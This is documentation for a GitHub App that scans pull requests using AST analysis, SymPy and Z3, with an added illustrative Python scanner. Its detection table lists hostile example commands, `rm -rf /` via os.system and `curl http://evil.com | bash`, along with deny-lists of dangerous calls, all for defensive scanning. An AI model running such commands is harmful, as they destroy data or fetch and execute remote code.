QWED Security GitHub App
QWED Security is a GitHub App that automatically scans your Pull Requests using deterministic verification engines — not another LLM. It uses formal solvers (SymPy, Z3) and AST analysis to mathematically prove that code, math, and logic in your PRs are correct.
Unlike AI code reviewers that “guess,” QWED Security provides deterministic proof. 1+1 always equals 2.
How It Works
```text
Pull Request Opened / Updated
        ↓
GitHub Webhook → QWED Security App
        ↓
QWEDLocal Verification Engine
  ├─ 🛡️ Code Security (AST Analysis)
  ├─ 🧮 Math Verification (SymPy)
  ├─ ⚖️ Logic Validation (Z3 Prover)
  └─ 🔒 PII Detection (Regex Patterns)
        ↓
✅ Pass or ❌ Fail
        ↓
Results posted as a GitHub Check Run
```
- A developer opens or updates a Pull Request
- GitHub sends a webhook event to the QWED Security App
- The app creates a Check Run (“QWED Security”) on the PR
- Files are scanned using QWEDLocal — QWED’s in-process verification engine
- Results are posted directly to the Checks tab on the PR
What QWED Security Catches
🛡️ Code Security (AST Analysis)
Detects dangerous code patterns before they reach production:
| Pattern | Example | Risk |
|---|---|---|
| Shell injection | `os.system('rm -rf /')` | Remote Code Execution |
| Eval/Exec | `eval(user_input)` | Arbitrary code execution |
| Pipe-to-shell | `curl http://evil.com \| bash` | Supply chain attack |
| Hardcoded secrets | `api_key = "sk-proj-..."` | Credential exposure |
| Unsafe imports | `import subprocess` | Privilege escalation |
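The following is an added illustration of how an AST pass can flag the patterns in the table above (forbidden calls, unsafe imports, hardcoded key-shaped literals); it is not QWEDLocal's own code, and the forbidden lists, the `sk-proj-` key regex and the sample file are constructed for the example.

```python
import ast
import re

# Constructed sample PR file (not from the project) containing several findings.
SAMPLE_SOURCE = '''
import os
import subprocess
api_key = "sk-proj-EXAMPLE0000000000000000"
def run(cmd):
    os.system(cmd)
    return eval(cmd)
'''

# Assumed deny-lists mirroring the README table, not QWEDLocal's real rule set.
FORBIDDEN_CALLS = {"os.system", "eval", "exec"}
FORBIDDEN_IMPORTS = {"subprocess"}
# Constructed pattern for project-style API keys ("sk-proj-..." in the table).
SECRET_RE = re.compile(r"^sk-proj-[A-Za-z0-9_-]{8,}$")


def _call_name(node: ast.Call) -> str:
    """Return the dotted callee name ('os.system', 'eval'), or '' if not a simple name."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return f"{func.value.id}.{func.attr}"
    return ""


def scan_source(source: str) -> list[tuple[int, str, str]]:
    """Walk the AST once and return (line, category, reason) findings, sorted by line."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            if name in FORBIDDEN_CALLS:
                findings.append((node.lineno, "SECURITY_RISK", f"Forbidden function '{name}' detected"))
        elif isinstance(node, (ast.Import, ast.ImportFrom)):
            # 'import a.b' and 'from a.b import c' both resolve to top-level module 'a'.
            mods = [a.name for a in node.names] if isinstance(node, ast.Import) else [node.module or ""]
            for mod in mods:
                if mod.split(".")[0] in FORBIDDEN_IMPORTS:
                    findings.append((node.lineno, "UNSAFE_IMPORT", f"Import of '{mod}' detected"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str) and SECRET_RE.match(node.value):
            findings.append((node.lineno, "HARDCODED_SECRET", "String literal looks like an API key"))
    return sorted(findings)


if __name__ == "__main__":
    for line, category, reason in scan_source(SAMPLE_SOURCE):
        print(f"❌ sample.py:{line}: {category}\n> Reason: {reason}")
```

Because the check works on the syntax tree rather than on text, `os.system` is caught whether or not it is split across lines or wrapped in other expressions, while a comment mentioning `eval` produces no finding.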
🧮 Math Verification (SymPy)
Validates mathematical formulas and constants — tax rate calculations, interest/NPV formulas, unit conversions, and financial compliance rules.
⚖️ Logic Validation (Z3 Prover)
Ensures boolean logic and business rules are satisfiable — contract clause contradictions, business rule conflicts, and constraint satisfaction.
🔒 PII Detection
Detects sensitive data before it enters your codebase — credit card numbers, Social Security Numbers, email addresses, and API keys.
Installation
- Visit the QWED Security App
- Click Install
- Select the repositories you want to protect
- Done — QWED Security will automatically scan new Pull Requests
The app is currently under GitHub publishing review. You can still use the direct app link for installation and updates.
Plans
| Plan | Scope | Price |
|---|---|---|
| Free | Open source & personal repositories | $0 |
| Pro | Private repositories, priority scanning | Coming soon |
Check Run Output
When QWED Security scans a PR, you’ll see results directly in the Checks tab:
✅ All Clear

```text
QWED Verification Report

✅ Verified Files
✅ math_logic.py: Passed
✅ api_handler.py: Passed
```

❌ Issues Found

```text
QWED Verification Report

🚨 Issues Detected
❌ dangerous.py: SECURITY_RISK
> Reason: Forbidden function 'os.system' detected

✅ Verified Files
✅ math_logic.py: Passed
```
Privacy & Security
- No code storage: Files are analyzed in-memory and discarded
- Webhook verification: HMAC-SHA256 signature validation
- JWT authentication: Short-lived JWT tokens (10-minute expiry)
- Open source engines: All verification logic is Apache 2.0
Permissions
| Permission | Access | Purpose |
|---|---|---|
| Checks | Read & Write | Create and update Check Runs on PRs |
| Pull Requests | Read | Read PR metadata and trigger scans |
| Contents | Read | Read repository files for verification |
Configuration
QWED Security works out of the box with zero configuration for Python projects. Simply install the app and it will start scanning PRs immediately.
- Languages: Python, Go, Rust, and TypeScript
- Trigger: Pull Request events (opened, synchronized, reopened)
QWED Security App vs GitHub Action
| Feature | QWED Security (App) | QWED GitHub Action |
|---|---|---|
| Type | Installed GitHub App | CI/CD Action |
| Setup | One-click install | Add to workflow YAML |
| Trigger | Automatic on PR | Configured in workflow |
| Verification | Code security focus | Math, Logic, Code, SQL |
| LLM Required | No (pure AST analysis) | Optional (for translation) |
The GitHub App provides automatic, zero-config PR scanning. The GitHub Action provides configurable verification within your CI/CD pipeline. They complement each other.
Support